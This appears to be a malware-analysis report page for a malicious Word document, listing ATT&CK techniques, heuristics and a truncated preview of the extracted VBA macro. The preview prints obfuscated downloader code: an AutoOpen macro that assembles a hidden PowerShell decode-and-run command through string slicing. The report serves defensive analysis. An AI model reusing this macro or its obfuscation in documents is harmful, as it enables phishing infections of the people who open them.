MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, indicating it is designed to run automatically upon opening. The macro utilizes a Shell() call and constructs obfuscated strings that appear to be related to downloading and executing a second-stage payload. The specific strings like 'i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva' and '6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP' suggest a downloader functionality.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 129529 bytes |
SHA-256: 8802270af3e0422a8f28673597da8b0de3003ad1894b75407e4c27ea0320e655 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "IsOMqNqqiQsr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function OOuXFkPDirT() On Error Resume Next thUrTfb = OJDBDRch + CSng(687366) + 796075 / Sin(122938 - CByte(981610) / 997252 - Round(687366)) + zJJYEU * JLDZvtw - (796075 + 122938 + 981610 - 6873660) Set QCQvAA = KiYlSvE ORscZKZElz = "i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva" YUccGtGJ = CStr(Left(Right(ORscZKZElz, 24), 1)) + Left(Right(ORscZKZElz, 17), 2) + CStr(Left(Right(ORscZKZElz, 34), 5)) + CStr(Left(Right(ORscZKZElz, 29), 2)) + CStr(Left(Right(ORscZKZElz, 7), 1)) + Left(Right(ORscZKZElz, 23), 1) XRzlPRwQzF = "i3wsTyleA hAdj4iYdfaUzHJnDoDZTjCFZvaidJ2PhsWl" ZGmFM = CStr(Left(Right(XRzlPRwQzF, 30), 1)) + Left(Right(XRzlPRwQzF, 21), 3) + CStr(Left(Right(XRzlPRwQzF, 43), 6)) + Left(Right(XRzlPRwQzF, 36), 2) + CStr(Left(Right(XRzlPRwQzF, 9), 2)) + CStr(Left(Right(XRzlPRwQzF, 28), 1)) YRiGiSl = "6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP ( nEWFBv4oTvfIdBmEkYuKzw2oSIoNCoWKsJWJBGZhmWmb" aanVFbhm = CStr(Left(Right(YRiGiSl, 68), 2)) + CStr(Left(Right(YRiGiSl, 47), 6)) + CStr(Left(Right(YRiGiSl, 97), 14)) + CStr(Left(Right(YRiGiSl, 82), 5)) + Left(Right(YRiGiSl, 20), 4) + CStr(Left(Right(YRiGiSl, 63), 2)) + CStr(Left(Right(YRiGiSl, 29), 1)) kmSEElidsi = "i3esTREAM([Adj4rFc.aUzHJXCLATTjCFZvavtJiohsWlcrK" kzEiK = CStr(Left(Right(kmSEElidsi, 32), 1)) + CStr(Left(Right(kmSEElidsi, 22), 3)) + CStr(Left(Right(kmSEElidsi, 46), 7)) + CStr(Left(Right(kmSEElidsi, 39), 2)) + Left(Right(kmSEElidsi, 9), 2) + Left(Right(kmSEElidsi, 30), 1) GzYtSIDqouJ = "3i6rySTReAMdj4rYcfMUz][SCKDZTeMoZvavysTPhsWlcrKGWfoCzu" hnqEPHvL = CStr(Left(Right(GzYtSIDqouJ, 36), 1)) + CStr(Left(Right(GzYtSIDqouJ, 25), 3)) + CStr(Left(Right(GzYtSIDqouJ, 51), 8)) + Left(Right(GzYtSIDqouJ, 33), 3) + Left(Right(GzYtSIDqouJ, 18), 3) EIjTZTMw = "6c25VeRT]::FroMfbASEJXCKDZTeMFZTrvtJ2PhsWlcr.conoCzujmPYQisOgFBv464sfIdBm7kYuKzw2" EmZisKmlPDJ = CStr(Left(Right(EIjTZTMw, 54), 2)) + Left(Right(EIjTZTMw, 37), 4) + Left(Right(EIjTZTMw, 77), 11) + CStr(Left(Right(EIjTZTMw, 65), 4)) + CStr(Left(Right(EIjTZTMw, 16), 3)) + CStr(Left(Right(EIjTZTMw, 50), 2)) + Left(Right(EIjTZTMw, 24), 1) ihhKfRmEbb = "Z 'bR6Zr5xNzOAdjG(YcfaUzHTXCKD" Jidzr = Left(Right(ihhKfRmEbb, 20), 1) + Left(Right(ihhKfRmEbb, 14), 2) + CStr(Left(Right(ihhKfRmEbb, 29), 4)) + CStr(Left(Right(ihhKfRmEbb, 24), 2)) + CStr(Left(Right(ihhKfRmEbb, 5), 1)) wuuzM = fAcYJNEXZZ + CSng(158302) + 786837 / Sin(452645 - CByte(985248) / 497487 - Round(158302)) + mPOaIAs * kTnflQOJzs - (786837 + 452645 + 985248 - 1583020) Set buvArwzUJj = ZqEvGAEbqtC TFNLJhT = "Z8PtJ9c259AzOAdtIrYcfaxzHJX" zITLaHqM = Left(Right(TFNLJhT, 18), 1) + CStr(Left(Right(TFNLJhT, 12), 2)) + CStr(Left(Right(TFNLJhT, 26), 4)) + Left(Right(TFNLJhT, 22), 1) + CStr(Left(Right(TFNLJhT, 5), 1)) PpwTo = Chr(43) dpbAdwJTKB = "ZTsJvEra5xAsOAdj4r6kfaUzHJX3KDZTj" XoHizvZoE = Left(Right(dpbAdwJTKB, 22), 1) + CStr(Left(Right(dpbAdwJTKB, 15), 2)) + CStr(Left(Right(dpbAdwJTKB, 32), 5)) + Left(Right(dpbAdwJTKB, 27), 2) + Left(Right(dpbAdwJTKB, 6), 1) KtLlw = "ZKk0l6Dt5xszOAdjXVYcfaUzHOXCKD" iNrIY = Left(Right(KtLlw, 20), 1) + Left(Right(KtLlw, 14), 2) + CStr(Left(Right(KtLlw, 29), 4)) + CStr(Left(Right(KtLlw, 24), 2)) + CStr(Left(Right(KtLlw, 5), 1)) BpiBMnoa = "i3i6VEUoZNjHBJIbCsfaUzHJJCKLlTjCFZvavtJdw17WlcrKGWfoCzujmPxlGsOgFBv4oTvf" lGGXHi = CStr(Left(Right(BpiBMnoa, 48), 1)) + CStr(Left(Right(BpiBMnoa, 33), 4)) + CStr(Left(Right(BpiBMnoa, 68), 10)) + CStr(Left(Right(BpiBMnoa, 58), 4)) + CStr(Left(Right(BpiBMnoa, 14), 3)) + Left(Right(BpiBMnoa, 45), 2) JiizwB = "3iM7oxD6zOAdjvrCEfaUz9/XCKWzTjCFZvavtJ2" PlCTdXqDIZl = CStr(Left(Right(JiizwB, 26), 1)) + CStr(Left(Right(JiizwB, 18), 2)) + CStr(Left(Right(JiizwB, 37), 6)) + Left(Right(JiizwB, 24), 2) + CStr(Left(Right(JiizwB, 13), 2)) JCTcl = "i6c257Lb1W178czi8WI2rPJuIXZTjCFZvavt87Phs ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.